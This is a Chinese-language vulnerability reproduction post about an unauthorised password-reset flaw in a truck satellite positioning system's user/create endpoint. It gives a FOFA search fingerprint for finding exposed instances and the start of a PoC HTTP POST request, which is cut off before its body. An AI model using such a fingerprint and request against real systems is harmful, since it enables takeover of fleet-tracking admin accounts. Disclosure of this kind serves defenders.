卡车卫星定位系统 user/create 未授权密码重置漏洞复现

0x01 产品简介

卡车卫星定位系统是一种基于卫星通信和导航技术的系统,用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间,可以确定接收器(即卡车上的定位设备)所在的位置。具有高精度、高可靠性、全球覆盖等特点,因此在交通领域有广泛的应用。具体来说,它可以为卡车提供实时、准确的定位信息,帮助驾驶员规划行驶路线、避免迷路或走错路。同时,交通管理部门可以通过卫星定位系统对卡车进行监管,确保车辆按照规定路线行驶,防止违规行驶和交通事故的发生。此外,卡车卫星定位系统还可以用于车辆防盗、行驶路线监控及呼叫指挥等功能,提高车辆的安全性和管理效率。

0x02 漏洞概述

卡车卫星定位系统 user/create 接口存在未授权密码重置漏洞,远程攻击者可利用此漏洞获取后台管理权限,使系统处于极不安全的状态。

0x03 复现环境

FOFA:icon_hash="1553867732"

0x04 漏洞复现

PoC

POST /user/create HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: ap

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-04-24 13:20:02       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-24 13:20:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-24 13:20:02       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-24 13:20:02       20 阅读

热门阅读

  1. (一)Mysql创建一个博客相关的数据库

    2024-04-24 13:20:02       16 阅读
  2. springboot项目打war包,并且部署外部tomcat中

    2024-04-24 13:20:02       19 阅读
  3. 【Redis】Spring Boot应用中的Redis分布式锁示例

    2024-04-24 13:20:02       13 阅读
  4. windows、Mac如何安装vue开发环境?

    2024-04-24 13:20:02       14 阅读
  5. 在Linux上开启FTP服务

    2024-04-24 13:20:02       15 阅读
  6. LeetCode 344.反转字符串

    2024-04-24 13:20:02       15 阅读
  7. 多服务器上的 docker 实现互相访问

    2024-04-24 13:20:02       16 阅读